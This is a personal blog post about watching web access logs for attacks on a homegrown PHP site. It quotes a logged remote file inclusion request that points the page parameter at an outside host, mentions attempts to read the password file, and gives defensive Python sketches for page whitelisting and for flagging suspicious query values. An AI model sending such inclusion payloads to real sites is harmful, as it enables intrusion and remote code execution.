As you might have guessed from my earlier posting about del.icio.us, I pay attention to the access logs for my main website. It's interesting to see what pages are getting traffic, and where that traffic is coming from. This month, of course, the article on Java Reference Objects was far and away the winner, with almost exactly 50% of the hits. However, nearly 25% of these hits came from Google searches — which is not surprising, since it's on the first page when you Google “java reference objects”. Unfortunately for the world of software, a lot of the query strings indicate deep misunderstandings of how Java works. And then there are the strange ones: I have yet to figure out what “sensitive objects” could be.
What's really interesting about my access logs, however (and why I look at them rather than using a web beacon), are the attacks on my site. I have a homegrown page management system, which I think is fairly solid, but ever since I saw the first attack I've paid attention to them. Here's a typical log entry that appears to be coming from a home computer:
18.104.22.168 - - [05/Sep/2009:16:38:07 -0700] "GET /index.php?page=http://22.214.171.124/~calebsbi/logo.jpg? HTTP/1.1"
If my pages blindly took the page parameter value and passed it to include, this attack would work. And if you Google for “calebsbi” you'll see over 30,000 hits, indicating that there are a lot of people who blindly pass parameters to include. Other attacks try to read the password file, and one enterprising person wrote a script that sent himself email (to a Google address, which I promptly reported).
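For contrast, here is a minimal sketch of the non-blind approach: treat the page parameter as a key into a fixed table rather than as a path. It is written in Python for illustration (the site itself is PHP), and the page names, file paths, and the resolve_page function are all hypothetical, not taken from my page management system.

```python
from pathlib import Path

# Hypothetical table of public page names and the files that back them.
# These names are illustrative only, not the real site's pages.
PAGES = {
    "home": Path("pages/home.html"),
    "articles": Path("pages/articles.html"),
}
DEFAULT_PAGE = "home"


def resolve_page(page_param):
    """Return the file for a requested page without building a path from user input."""
    # The lookup is by exact key, so remote URLs and "../" sequences
    # simply fail to match and fall back to the default page.
    return PAGES.get(page_param or DEFAULT_PAGE, PAGES[DEFAULT_PAGE])
```

With a table like this, the request in the log entry above would resolve to the default page, because the attacker's URL is not one of the known keys.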
What's amazing to me is the amount of effort these people expend. Oh, sure, I expect that the actual hits come from a bot, but someone has gone to the trouble to figure out that my site is driven by the page parameter: I don't get hits with sql=. And it's not always a botnet doing the hits: one night a person came to my site from Twitter, and spent over an hour trying different URL combinations. He (I'll assume) actually managed to uncover portions of my site's directory tree (the programming examples use a simple directory tree, which has since been “capped” with a redirect), and started trying URLs that included functions from my page fragments.
So far, my site hasn't been hacked, and I think a large part of the reason is that the attackers have been “script kiddies,” trying attacks that they don't really understand. The person who walked my programming directories, for example, kept putting needless parameters on the URLs. And if you try to retrieve “logo.jpg”, you'll find that there's no longer any webserver at that address. Yet the attacks keep coming, so I keep looking to see that my site code behaves as expected.
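Watching the logs for this kind of thing can be partly automated. The following is a rough Python sketch, not the tooling I actually use: it pulls the request out of a log line in the format shown earlier and reports any query parameter whose value looks like a remote URL, a directory traversal, or a password-file read. The function name and the patterns are assumptions, and the patterns are heuristics rather than a complete list of attacks.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Matches the quoted request portion of a log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Heuristic patterns (assumptions): a value that starts with a remote URL,
# or that contains "../" or "/etc/passwd" anywhere.
SUSPICIOUS_RE = re.compile(r'^(?:https?|ftp)://|\.\./|/etc/passwd', re.IGNORECASE)


def suspicious_params(log_line):
    """Return (name, value) query parameters that look like inclusion attempts."""
    match = REQUEST_RE.search(log_line)
    if match is None:
        return []  # not a request line this sketch understands
    query = urlsplit(match.group("target")).query
    return [
        (name, value)
        for name, value in parse_qsl(query, keep_blank_values=True)
        if SUSPICIOUS_RE.search(value)
    ]
```

Run over the log entry quoted above, this reports the page parameter together with the remote URL it was given; an ordinary request such as /index.php?page=home produces an empty list.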